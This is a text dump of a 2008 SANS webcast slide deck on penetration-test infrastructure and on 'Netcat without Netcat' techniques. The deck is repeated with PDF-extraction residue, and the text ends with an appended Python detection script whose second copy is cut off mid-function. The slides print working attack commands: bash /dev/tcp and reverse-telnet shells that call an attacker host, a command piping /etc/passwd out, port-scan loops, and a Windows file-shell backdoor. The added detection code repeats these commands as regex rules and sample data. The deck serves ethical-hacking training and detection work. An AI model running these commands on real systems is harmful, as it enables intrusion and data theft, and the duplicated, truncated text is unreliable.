Penetration Testing Ninjitsu 2: Crouching Netcat, Hidden Vulnerabilities

Copyright 2008, SANS
Version 2Q08
By Ed Skoudis

Network Pen Testing & Ethical Hacking - ©2008, Ed Skoudis


Outline

• Building a Penetration Test Infrastructure
• Netcat without Netcat
• Conclusions
• Q&A


Building an Infrastructure for Ethical Hacking

• Before starting a test, you need an infrastructure, including:
  – Software
  – Hardware
  – Network infrastructure
• We will discuss some components of a baseline testing infrastructure
  – You will likely tweak or extend it
  – But it is a reasonable starting point
  – We'll focus on software and network stuff


Linux vs. Windows

• Should you concentrate on Linux or Windows? Yes.
• We recommend that your pen test rig include both
  – Virtualized with VMware to rapidly switch between them
• Don't think of them as two different operating systems
  – Think of them as one set of tools you use in your work
  – Not two different toolboxes, but one toolbox with two different compartments
• Is Mac OS X acceptable?
  – It's OK, but you should have virtual Windows and Linux


Software for Testing – Free Test Tools

• Bootable Linux environments can be very helpful
  – Someone has gone through the difficulty of compiling and installing various tools to make everything work
  – One of my favorites is BackTrack, free at http://www.remote-exploit.org/backtrack.html
• Other free sources of tools
  – Milw0rm – www.milw0rm.com
    • Exploits sorted by OS, date, local/remote, etc.
  – Packetstorm Security – http://packetstormsecurity.org
    • Vast history of attack and defense tools


Commercial Tools

• There are numerous useful commercial tools available for pen testers, providing:
  – Typically higher quality and more frequent updates
  – Support – very important for professional testing
• Useful examples include:
  – CORE IMPACT – OS, network services, client-side, and web app exploitation
  – Tenable Security's commercialized Nessus – OS and network services vulnerability scan
  – HP SPI Dynamics' WebInspect – web app vulnerability discovery and exploit


Testing Network Infrastructure - ISP

• For internal testing, a fast connection near a backbone with minimal filtering is ideal
• For Internet-based testing, you will need to send packets through your ISP to the target
  – Scanning – large number of sometimes unusual packets
  – Exploitation
• Some ISPs detect scanning or exploits and then block them
  – Some do this with network-based Intrusion Prevention Systems
• Can seriously impair your ability to test and the accuracy of your results
• Tell your ISP that you plan to do pen tests, and ask if they block


Outline

• Building a Penetration Test Infrastructure
• Netcat without Netcat
• Conclusions
• Q&A


What is Netcat?

• Netcat: General-purpose TCP and UDP network widget, running on Linux/Unix and Windows
• Takes Standard In and sends it across the network
• Receives data from the network and puts it on Standard Out
• Messages from Netcat itself are put on Standard Error

[Diagram: Netcat sits between The System and The Network. Standard In goes into Netcat and is sent as packets; received packets come out of Netcat on Standard Out; Netcat's own messages go to Standard Error.]


What Can Netcat Do for Us?

• Send files
• Port scan
• Backdoor shell access
• Connecting to arbitrary open ports
• Vulnerability scanning
• Simple chats
• Replay data in TCP or UDP packets
• Relays bouncing between systems
• Much, much more…


What Is Netcat Without Netcat?

• Netcat without Netcat involves constructing commands that achieve Netcat behavior…
  – …without the use of Netcat
• We'll rely on built-in tools only
• Remember those old AT&T commercials?
  – Have you ever kissed your baby goodnight… from a payphone?
  – Have you ever made a command shell backdoor using Linux's /dev/tcp?
  – Have you ever shoveled shell using Linux telnet clients?
  – Have you ever made a port scanner using a Windows FTP client?
  – Have you ever made the Windows file system behave like a command shell?
• YOU WILL


Why Netcat without Netcat?

• For penetration testers:
  – Netcat functionality is very useful in making one system attack another machine
  – But the project's rules of engagement may prohibit installation of additional software such as Netcat on compromised targets
  – Some anti-virus tools detect and block Netcat
  – Live off the land: Be a command-line MacGyver
  – Where we're going, we don't need Netcat

[Diagram: Attacker, with shell access on a Conquered Target, uses that target to scan, analyze and exploit the Next Target.]


Useful Netcat Functions

• As we've seen, Netcat can be used in countless different ways
• Let's pick some of the most useful and see how we can make built-in tools do each function on Linux and Windows:
  – Backdoor shell
  – File transfer
  – Port scanner
• We'll vary the order in which we do each action, as we'll build from fundamental principles to more complex techniques
  – And the order of those principles differs between Linux and Windows


Linux

• /dev/tcp rocks
• On most Linux variants (except Debian-derived systems like Ubuntu), the default built-in bash can redirect to and from /dev/tcp/[IPaddr]/[port]
  – Opens a connection with the target IPaddr on that port
• With a little command-line magic, we can use this for Netcat-like behavior


Linux Command-Line File Transfer

• To send a file, we can just redirect its contents into /dev/tcp/[IPaddr]/[port], as in:

    $ cat /etc/passwd > /dev/tcp/[IPaddr]/[port]

• Catch it on the other side with a Netcat listener


Linux Command-Line Backdoor via /dev/tcp

• We can connect Standard In, Standard Out, and Standard Error of a bash shell to /dev/tcp to implement a reverse shell backdoor:

    /bin/bash -i > /dev/tcp/[Attacker_IPaddr]/[port] 0<&1 2>&1

• Shovels a shell from the victim Linux machine to the attacker's waiting Netcat listener, where commands can be entered

[Diagram: a firewall blocks incoming connections to the Protected Server. The Protected Server runs "/bin/bash -i > /dev/tcp/[Attacker_IPaddr]/[port] 0<&1 2>&1" and is where commands are executed; the attacker runs "nc -l -p [p]" and types commands there.]


Linux Command-Line Reverse Shell Backdoor In Action


Linux Command-Line Port Scanner

• To see if a single port is open, we could run:

    $ echo > /dev/tcp/[IPaddr]/[port]

• Note that the "Connection refused" text is not placed on Standard Output or Standard Error
  – The shell prints it inline, so we cannot redirect it to a file

[Screenshot: Port 80 is listening]


Storing Results and Iterating

• But it does set the error condition variable "$?" to 0 if the port is open, 1 if it is closed
• For a port scanner, we could use a while loop that increments through port numbers:

    $ port=1; while [ $port -lt 1024 ]; do echo > /dev/tcp/[IPaddr]/$port; [ $? == 0 ] && echo $port is open >> /tmp/ports.txt; port=`expr $port + 1`; done

• We append results in the loop (>> /tmp/ports.txt) so that they can be tailed while the scan is running
  – I want this to be as operationally clean as possible for pen testers


Command-Line Port Scanner In Action


Linux Command-Line Backdoor via "Reverse Telnet"

• There's a whole different way we can get remote shell without using /dev/tcp
• Linux telnet clients let us redirect Standard In and Standard Out
• Gives rise to "Reverse telnet"
• On the target machine, we could run:

    $ telnet [attacker_IPaddr] [port1] | /bin/bash | telnet [attacker_IPaddr] [port2]

• Provide commands on the attacker's machine via port1
• Receive output on the attacker's machine on port2


Reverse Telnet Shell in Action


Windows

• Built-in command line has very clunky syntax
• Also, telnet and ftp clients are absolutely atrocious
  – Especially in the way that they (don't) interact with Standard In and Standard Out
• Thus, we will build Netcat-without-Netcat from some fundamental command-line building blocks in Windows


Building Blocks: Windows FOR Loops

• Iteration can be very helpful
  – We're not expecting you to be programmers
  – But sometimes you'll want to iterate over a given set of items
    • Numbers
    • Lines in a file
• The Windows command line supports several kinds of FOR loops… some of the most useful are:
  – FOR /L: Counter
  – FOR /F: Iterate over file contents, strings, or command output
• See the first webcast in this series for details on how these work… we won't go through them again here


Windows Port Scanner Using Telnet Client

• We could systematically telnet to port after port:

    C:\> for /L %i in (1,1,1024) do telnet [IPaddr] %i

• Problem: When it finds an open port, it hangs
• How to address?
  – Watch it… When it stops, hit CTRL-[ and then type quit to resume
  – Or kill the telnet client every 5 seconds:

    C:\> for /L %i in (1,0,2) do wmic process where name="telnet.exe" delete & ping -n 6 127.0.0.1

  – Downside: Race condition may kill one that hasn't finished checking


More Problems with Windows Telnet Client as a Port Scanner

• Other problems:
  – Results aren't logged
    • You can't do anything with Standard Out of the telnet client
      – Attempts at redirection either make it hang or not run
    • And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logs… No append option
    • So you have to watch it, sadly
  – Most versions of Vista do not include the telnet client by default
    • But Netcat without Netcat is about living off the land
• There must be a better way


Windows Port Scanner Using FTP Client

• Windows FTP client: C:\> ftp [IPaddr]
• Problem: Can't specify the port to connect to on the invocation command line… only connects to TCP port 21
• Solution: But you can specify the destination port in an FTP command file:
  – open [IPaddr] [port]
• Then the ftp client can read the contents of that file and do what it says by being invoked with:
  – C:\> ftp -s:[filename]
• We'll write a loop that generates an FTP command file and invokes FTP to run commands from that file, displaying or storing results at each iteration


The Windows Command Line Port Scanner Using FTP Client

    C:\> for /L %i in (1,1,1024) do echo open [IPaddr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt

• Problem: It hangs for about 30 seconds on an open port, then moves on
  – That's not so bad
• Another Problem: It doesn't store results
  – We can fix that, but it gets a little ugly


Making It Store Results

    C:\> for /L %i in (1,1,1024) do echo Checking Port %i >> ports.txt & echo open [IP_addr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt


Windows Command-Line File Transfer

• File transfer on arbitrary ports is hard
• But we can use Windows file and print sharing on the command line, redirecting to shares:

    C:\> type [filename] > \\[machine]\[share]\[filename]

• Will use current user credentials…
• Or, if you want different credentials, first do a:
  – C:\> net use \\[machine] [password] /u:[user]
• Can't we just use copy or move? Yes, but relying on redirection (>) of Standard Out is nice here
  – Because we can redirect the output of commands across the network, not just files


File Transfer in Action


Backdoors: The File Shell

• Now let's do a backdoor
• Listening on a port is hard…
• But we can look in the file system
• A FOR loop can spin looking for a command in a file, run the command, and dump output to another file:

    C:\> for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1


Using the File Shell

• Now we can feed it commands by echoing them into \\[IP_addr]\[share]\commands.txt
• And we can read results by using type to read \\[IP_addr]\[share]\output.txt
• The file shell is a building block…
  – Other folks are starting to use it, extending the idea
  – Use the FTP client to move commands on arbitrary ports, writing them into the file system
  – Or rely on nslookup to pull domain names that include commands


The File Shell In Action


Outline

• Building a Penetration Test Infrastructure
• Netcat without Netcat
• Conclusions
• Q&A


Conclusions

• Netcat without Netcat shows that, with only individual command execution on a target machine, an attacker can use built-in tools to wield significant control over the target box
• Defenders need to be able to interpret attackers' actions and anticipate their moves
• Penetration testers need to be able to make the most of built-in tools to operate within the rules of engagement for their projects
• Netcat without Netcat serves these goals
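As an added defender's example, not part of the original webcast material: the Python below flags process command lines that match the techniques shown in the Linux slides (/dev/tcp reverse shell, file push and port sweep, reverse telnet) and the Windows slides (telnet and FTP-client scan loops, the wmic telnet killer, the FOR-loop file shell). The rules and the sample command lines are constructed here; the benign look-alikes show why each rule keys on the combination of tool, loop and redirection rather than on the tool name alone.

```python
"""Detection helper for the Netcat-without-Netcat command patterns in this deck.

Added example (not from the original webcast): the rules and the sample
command lines below are constructed to exercise each technique once.
Input is one process command line per string, e.g. from auditd EXECVE
records or a Sysmon process-creation event's CommandLine field.
"""
import re
from typing import Dict, List, Tuple

# (rule name, compiled regex). Each pattern requires the specific combination
# of built-in tool plus loop/redirection that the technique depends on, so a
# lone "telnet host 25" or a scripted "ftp -s:" upload is not flagged.
RULES: List[Tuple[str, re.Pattern]] = [
    # /bin/bash -i > /dev/tcp/[ip]/[port] 0<&1 2>&1  (reverse shell)
    ("devtcp_reverse_shell",
     re.compile(r"bash\s+-i\b.*>\s*/dev/tcp/\S+\s+0<&1")),
    # cat [file] > /dev/tcp/[ip]/[port]  (file push to a listener)
    ("devtcp_file_exfil",
     re.compile(r"\bcat\s+\S+\s*>\s*/dev/tcp/\S+")),
    # while [ $port -lt N ]; do echo > /dev/tcp/[ip]/$port ...  (port sweep)
    ("devtcp_port_sweep",
     re.compile(r"while\s+\[.*-lt.*\].*echo\s*>\s*/dev/tcp/\S+/\$\w+")),
    # telnet [ip] [p1] | /bin/bash | telnet [ip] [p2]  (reverse telnet)
    ("reverse_telnet",
     re.compile(r"telnet\s+\S+\s+\d+\s*\|\s*(?:/bin/)?(?:ba)?sh\s*\|\s*telnet\s+\S+")),
    # for /L %i in (...) do telnet [ip] %i  (telnet-client scan loop)
    ("win_telnet_sweep",
     re.compile(r"for\s+/L\s+%+\w+\s+in\s*\([^)]*\)\s+do\s+telnet\s+", re.I)),
    # wmic process where name="telnet.exe" delete  (the 5-second telnet killer)
    ("win_telnet_killer",
     re.compile(r'wmic\s+process\s+where\s+name="?telnet\.exe"?\s+delete', re.I)),
    # for /L ... do echo open [ip] %i > ftp.txt ... ftp -s:ftp.txt  (FTP-client scan)
    ("win_ftp_sweep",
     re.compile(r"for\s+/L\s+%+\w+\s+in\s*\([^)]*\)\s+do\b.*echo\s+open\s+\S+\s+%+\w+"
                r".*ftp\s+-s:", re.I)),
    # for /f ... %j in (commands.txt) do cmd.exe /c %j ... del commands.txt  (file shell)
    ("win_file_shell",
     re.compile(r"for\s+/f\s+.*\bin\s*\(\S+\)\s*do\s+cmd(?:\.exe)?\s+/c\s+%+\w+"
                r".*\bdel\s+\S+", re.I)),
]


def classify(cmdline: str) -> List[str]:
    """Names of every rule that matches this command line (empty if benign)."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(cmdlines: List[str]) -> List[Tuple[int, str, str]]:
    """Apply all rules to a batch; returns (index, rule name, command line) hits."""
    return [(idx, name, line)
            for idx, line in enumerate(cmdlines)
            for name in classify(line)]


def summarize(cmdlines: List[str]) -> Dict[str, int]:
    """Hit count per rule, for a quick triage table."""
    counts: Dict[str, int] = {}
    for _, name, _ in scan(cmdlines):
        counts[name] = counts.get(name, 0) + 1
    return counts


# Constructed sample command lines: one per technique, then benign look-alikes.
SAMPLE_CMDLINES = [
    '/bin/bash -i > /dev/tcp/10.0.0.5/443 0<&1 2>&1',
    'bash -c "cat /etc/passwd > /dev/tcp/10.0.0.5/8080"',
    'bash -c "port=1; while [ $port -lt 1024 ]; do echo > /dev/tcp/10.0.0.9/$port; '
    '[ $? == 0 ] && echo $port is open >> /tmp/ports.txt; port=`expr $port + 1`; done"',
    'telnet 10.0.0.5 4444 | /bin/bash | telnet 10.0.0.5 4445',
    'cmd.exe /c for /L %i in (1,1,1024) do telnet 10.0.0.9 %i',
    'cmd.exe /c for /L %i in (1,0,2) do wmic process where name="telnet.exe" delete'
    ' & ping -n 6 127.0.0.1',
    'cmd.exe /c for /L %i in (1,1,1024) do echo open 10.0.0.9 %i > ftp.txt'
    ' & echo quit >> ftp.txt & ftp -s:ftp.txt',
    'cmd.exe /c for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt)'
    ' do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1',
    'telnet mail.example.com 25',                 # benign: a single interactive telnet
    'ftp -s:nightly_upload.txt ftp.example.com',   # benign: scripted FTP job
    'bash -c "echo done > /tmp/status.txt"',       # benign: ordinary redirection
]

if __name__ == "__main__":
    for idx, name, line in scan(SAMPLE_CMDLINES):
        print(f"[{name}] #{idx}: {line}")
    print("unflagged:", [l for l in SAMPLE_CMDLINES if not classify(l)])
```

Batch-file variants use doubled percent signs (%%i), which the `%+` in the Windows rules accepts, and the rules are case-insensitive because cmd.exe is.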


Follow-Up

• SANS Security 560: Network Penetration Testing and Ethical Hacking
• 20% discount if you registered for this webcast
  – Use registration discount code of PENTEST20
• Discount applies to the 560 course through August
  – June 4-9: Las Vegas, NV (Skoudis)
  – June 12-July 22: Home, On-Line (Skoudis)
  – July 24-29: Wash DC (Skoudis)
  – Aug 11-16: Boston (Shackleford)
  – Aug 18-23: Minneapolis (Conrad)
  – Aug 24-29: Va Beach (Strand)
• Go to www.sans.org and look for "560" for details


Outline

• Why Penetration Testing?
• Windows Command Line Tips for Pen Testers
• Conclusions
• Q&A
  – REMEMBER: The third webcast in this series of three will be on August 21, 2008

Page 2: Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 239

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 339

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 3

Outline

bull Building a Penetration TestInfrastructure

bull Netcat without Netcatbull Conclusions

bull QampA

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 439Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 4

Building an Infrastructure for

Ethical Hackingbull Before starting a test you need an

infrastructure including ndash Software

ndash Hardware

ndash Network infrastructure

bull We will discuss some components of abaseline testing infrastructure ndash You will likely tweak or extend it

ndash But it is a reasonable starting point

ndash Wersquoll focus on software and network stuff

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 539Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 5

Linux vs Windowsbull Should you concentrate on Linux or Windows Yes

bull We recommend that your pen test rig include both ndash Virtualized with VMware to rapidly switch between them

bull Donrsquot think of them as two different operatingsystems ndash Think of them as one set of tools you use in your work

ndash Not two different toolboxes but one toolbox with twodifferent compartments

bull Is Mac OS X acceptable

ndash Itrsquos OK but you should have virtual Windows and Linux

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 639Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 6

Software for Testing ndash

Free Test Tools

bull Bootable Linux environments can be very helpful ndash Someone has gone through the difficulty of compilingand installing various tools to make everything work

ndash On of my favorites is Backtrack free athttpwwwremote-exploitorgbacktrackhtml

bull Other free sources of tools

ndash Milw0rm ndash wwwmilw0rmcombull Exploits sorted by OS date localremote etc

ndash Packetstorm Security ndash httppacketstormsecurityorgbull Vast history of attack and defense tools

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 739Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 7

Commercial Toolsbull There are numerous useful commercial tools

available for pen testers providing ndash Typically higher quality and more frequent updates

ndash Support ndash very important for professional testing

bull Useful examples include ndash CORE IMPACT ndash OS network services client-side

and web app exploitation

ndash Tenable Securityrsquos commercialized Nessus ndash OSand network services vulnerability scan

ndash HP SPI Dynamicsrsquo WebInspect ndash web app

vulnerability discovery and exploit

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 839Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 8

Testing Network

Infrastructure - ISPbull For internal testing a fast connection near a backbone with

minimal filtering is idealbull For Internet-based testing you will need to send packets

through your ISP to the target

ndash Scanning ndash large number of sometimes unusual packets ndash Exploitation

bull Some ISPs detect scanning or exploits and then block them ndash Some do this with network-based Intrusion Prevention Systems

bull Can seriously impair your ability to test and the accuracy of your results

bull Tell your ISP that you plan to do pen tests and ask if theyblock

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 939Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 9

Outline

bull Building a Penetration TestInfrastructure

bull Netcat without Netcatbull Conclusions

bull QampA

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1039

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 10

What is Netcat

bull Netcat General-purpose TCP and UDP network widget running on LinuxUnix and Windows

bull Takes Standard In and sends it across the network

bull Receives data from the network and puts it onStandard Out

bull Messages from Netcat itself put on Standard Error

NetcatStd Out Receive packets

Std In Send packets

Std Err

The

System

The

Network

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1139

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 11

What Can Netcat Do for Usbull Send files

bull Port scan

bull Backdoor shell access

bull Connecting to arbitrary open portsbull Vulnerability scanning

bull Simple chats

bull Replay data in TCP or UDP packets

bull Relays bouncing between systems

bull Much much morehellip

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1239

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 12

What Is Netcat Without

Netcatbull Netcat without Netcat involves constructing commands

that achieve Netcat behaviorhellip ndash hellipwithout the use of Netcat

bull Wersquoll rely on built-in tools only

bull Remember those old ATampT commercials ndash Have you ever kissed your baby goodnighthellip from a payphone

ndash Have you ever made a command shell backdoor using Linuxrsquos devtcp

ndash Have you ever shoveled shell using Linux telnet clients ndash Have you ever made a port scanner using a Windows FTP client

ndash Have you ever made the Windows file system behave like acommand shell

bull YOU WILL

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1339

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 13

Why Netcat without Netcatbull For penetration testers

ndash Netcat functionality is very useful in making one systemattack another machine

ndash But the projectrsquos rules of engagement may prohibitinstallation of additional software such as Netcat on

compromised targets ndash Some anti-virus tools detect and block Netcat

ndash Live off the land Be a command-line MacGyver

ndash Where wersquore going we donrsquot need Netcat

Attacker

ConqueredTarget

Next Target

S h e l l

a c c ess

sca na na ly z eex p lo it

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1439

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 14

Useful Netcat Functions

• As we've seen, Netcat can be used in countless different ways
• Let's pick some of the most useful and see how we can make built-in tools do each function on Linux and Windows:
  – Backdoor shell
  – File transfer
  – Port scanner
• We'll vary the order in which we do each action, as we'll build from fundamental principles to more complex techniques
  – And the order of those principles differs between Linux and Windows


Linux

• /dev/tcp rocks
• On most Linux variants (except Debian-derived systems like Ubuntu), the default built-in bash can redirect to and from /dev/tcp/[IPaddr]/[port]
  – Opens a connection with the target IPaddr on that port
• With a little command-line magic, we can use this for Netcat-like behavior


Linux Command-Line File Transfer

• To send a file, we can just redirect its contents into /dev/tcp/[IPaddr]/[port], as in:
  $ cat /etc/passwd > /dev/tcp/[IPaddr]/[port]
• Catch it on the other side with a Netcat listener


Linux Command-Line Backdoor via /dev/tcp

• We can connect Standard In, Standard Out, and Standard Error of a bash shell to /dev/tcp to implement a reverse shell backdoor:
  /bin/bash -i > /dev/tcp/[Attacker_IPaddr]/[port] 0<&1 2>&1
• Shovels a shell from the victim Linux machine to the attacker's waiting Netcat listener, where commands can be entered

[Diagram: the firewall blocks incoming connections to the Protected Server; the server runs "/bin/bash -i > /dev/tcp/[Attacker_IPaddr]/[port] 0<&1 2>&1" (commands executed here), connecting out to the attacker's "nc -l -p [p]" listener (type commands here)]


Linux Command-Line Reverse Shell Backdoor In Action


Linux Command-Line Port Scanner

• To see if a single port is open, we could run:
  $ echo > /dev/tcp/[IPaddr]/[port]
• Note that the "Connection refused" text is not placed on Standard Output or Standard Error
  – The shell puts them in line, so we cannot redirect them to a file

[Screenshot annotation: Port 80 is listening]


Storing Results and Iterating

• But it does set the error condition variable "$?" to 0 if the port is open, 1 if it is closed
• For a port scanner, we could use a while loop that increments through port numbers:
  $ port=1; while [ $port -lt 1024 ]; do echo > /dev/tcp/[IPaddr]/$port; [ $? == 0 ] && echo $port is open >> /tmp/ports.txt; port=`expr $port + 1`; done
• We append results in the loop (>> /tmp/ports.txt) so that they can be tailed while the scan is running
  – I want this to be as operationally clean as possible for pen testers


Command-Line Port Scanner In Action


Linux Command-Line Backdoor via "Reverse Telnet"

• There's a whole different way we can get a remote shell without using /dev/tcp
• Linux telnet clients let us redirect Standard In and Standard Out
• Gives rise to "Reverse telnet"
• On the target machine, we could run:
  $ telnet [attacker_IPaddr] [port1] | /bin/bash | telnet [attacker_IPaddr] [port2]
• Provide commands on the attacker's machine via port1
• Receive output on the attacker's machine on port2


Reverse Telnet Shell in Action


Windows

• Built-in command line has very clunky syntax
• Also, telnet and ftp clients are absolutely atrocious
  – Especially in the way that they (don't) interact with Standard In and Standard Out
• Thus, we will build Netcat-without-Netcat from some fundamental command-line building blocks in Windows


Building Blocks: Windows FOR Loops

• Iteration can be very helpful
  – We're not expecting you to be programmers
  – But sometimes you'll want to iterate over a given set of items:
    • Numbers
    • Lines in a file
• The Windows command line supports several kinds of FOR loops… some of the most useful are:
  – FOR /L: Counter
  – FOR /F: Iterate over file contents, strings, or command output
• See the first webcast in this series for details on how these work… we won't go through them again here


Windows Port Scanner Using Telnet Client

• We could systematically telnet to port after port:
  – C:\> for /L %i in (1,1,1024) do telnet [IPaddr] %i
• Problem: When it finds an open port, it hangs
• How to address?
  – Watch it… When it stops, hit CTRL-] and then type quit to resume
  – Or kill the telnet client every 5 seconds:
    • C:\> for /L %i in (1,0,2) do wmic process where name="telnet.exe" delete & ping -n 6 127.0.0.1
  – Downside: Race condition may kill one that hasn't finished checking


More Problems with Windows Telnet Client as a Port Scanner

• Other problems:
  – Results aren't logged
    • You can't do anything with Standard Out of the telnet client
      – Attempts at redirection either make it hang or not run
    • And the logging option of the Windows telnet client (-l [filename]) overwrites all earlier logs… No append option
    • So you have to watch it, sadly
  – Most versions of Vista do not include the telnet client by default
    • But Netcat without Netcat is about living off the land
• There must be a better way!


Windows Port Scanner Using FTP Client

• Windows FTP client: C:\> ftp [IPaddr]
• Problem: Can't specify the port to connect to on the invocation command line… only connects to TCP port 21
• Solution: But you can specify the dest port in an FTP command file:
  – open [IPaddr] [port]
• Then the ftp client can read the contents of that file and do what it says by being invoked with:
  – C:\> ftp -s:[filename]
• We'll write a loop that generates an FTP command file and invokes FTP to run commands from that file, displaying or storing results at each iteration


The Windows Command Line Port Scanner Using FTP Client

• C:\> for /L %i in (1,1,1024) do echo open [IPaddr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt
• Problem: It hangs for about 30 seconds on an open port, then moves on
  – That's not so bad
• Another Problem: It doesn't store results
  – We can fix that, but it gets a little ugly


Making It Store Results

• C:\> for /L %i in (1,1,1024) do echo Checking Port %i >> ports.txt & echo open [IP_addr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt


Windows Command-Line File Transfer

• File transfer on arbitrary ports is hard
• But we can use Windows file and print sharing on the command line, redirecting to shares:
  – C:\> type [filename] > \\[machine]\[share]\[filename]
• Will use current user credentials…
• Or, if you want different credentials, first do a:
  – C:\> net use \\[machine] [password] /u:[user]
• Can't we just use copy or move? Yes, but relying on redirection (>) of Standard Out is nice here
  – Because we can redirect the output of commands across the network, not just files


File Transfer in Action


Backdoors: The File Shell

• Now, let's do a backdoor
• Listening on a port is hard…
• But we can look in the file system
• A FOR loop can spin, looking for a command in a file, run the command, and dump output to another file:
  – C:\> for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1


Using the File Shell

• Now we can feed it commands by echoing them into \\[IP_addr]\[share]\commands.txt
• And we can read results by using type to read \\[IP_addr]\[share]\output.txt
• The file shell is a building block…
  – Other folks are starting to use it, extending the idea
  – Use the FTP client to move commands on arbitrary ports, writing them into the file system
  – Or rely on nslookup to pull domain names that include commands
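The living-off-the-land commands on the Linux slides (/dev/tcp redirections, reverse telnet) and on the Windows slides (telnet and FTP port-scan loops, the FOR-loop file shell) all leave distinctive command lines behind, which is where a defender can catch them. The following is an added example, not code from the webcast or from SANS: a small Python matcher with one rule per technique, run over constructed process-audit records in a made-up "user|host|command line" layout; the rule names, users, hosts and addresses are assumptions.

```python
"""Tag "Netcat without Netcat" command lines in process-audit records.

Added example (not from the original slides). Records use an assumed
'user|host|command line' layout; each rule keys on the distinctive tokens
of one command from the webcast, never on a specific address or port.
"""
import re

RULES = [
    # /bin/bash -i > /dev/tcp/[IP]/[port] 0<&1 2>&1
    ("linux_devtcp_reverse_shell",
     re.compile(r"bash\s+-i\b.*>\s*/dev/tcp/\S+.*0<&1")),
    # cat [file] > /dev/tcp/[IP]/[port]
    ("linux_devtcp_file_exfil",
     re.compile(r"\bcat\s+\S+\s*>\s*/dev/tcp/")),
    # while [ $port -lt N ]; do echo > /dev/tcp/[IP]/$port; ...
    ("linux_devtcp_port_scan",
     re.compile(r"while\s+\[.*\].*;\s*do.*/dev/tcp/.*\$port")),
    # telnet [IP] [port1] | /bin/bash | telnet [IP] [port2]
    ("linux_reverse_telnet",
     re.compile(r"telnet\s+\S+\s+\d+\s*\|\s*/bin/(ba)?sh\s*\|\s*telnet\b")),
    # for /L %i in (1,1,1024) do telnet [IP] %i   (%+ also covers %%i in .bat files)
    ("windows_telnet_port_scan",
     re.compile(r"for\s+/L\s+%+\w\s+in\s*\(.*\)\s*do\s+telnet\b", re.I)),
    # echo open [IP] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt
    ("windows_ftp_port_scan",
     re.compile(r"echo\s+open\s+\S+\s+%+\w.*\bftp\s+-s:", re.I)),
    # for /L %i in (1,0,2) do (for /f ... %j in (commands.txt) do cmd.exe /c %j ...)
    ("windows_file_shell",
     re.compile(r"for\s+/L\s+%+\w\s+in\s*\(1,0,2\).*for\s+/f\b.*cmd(\.exe)?\s+/c\s+%+\w", re.I)),
    # type [file] > \\[machine]\[share]\[file]   (weak signal on its own; review in context)
    ("windows_share_redirect",
     re.compile(r"\btype\s+\S+\s*>\s*\\\\[^\\]+\\", re.I)),
]


def classify(cmdline):
    """Return the names of every rule the command line matches (possibly none)."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def parse_record(line):
    """Split a 'user|host|command line' record; the command itself may contain '|'."""
    user, host, cmd = line.split("|", 2)
    return user, host, cmd


def scan(records):
    """Return one hit dict per record that matches at least one rule, in input order."""
    hits = []
    for line in records:
        user, host, cmd = parse_record(line)
        names = classify(cmd)
        if names:
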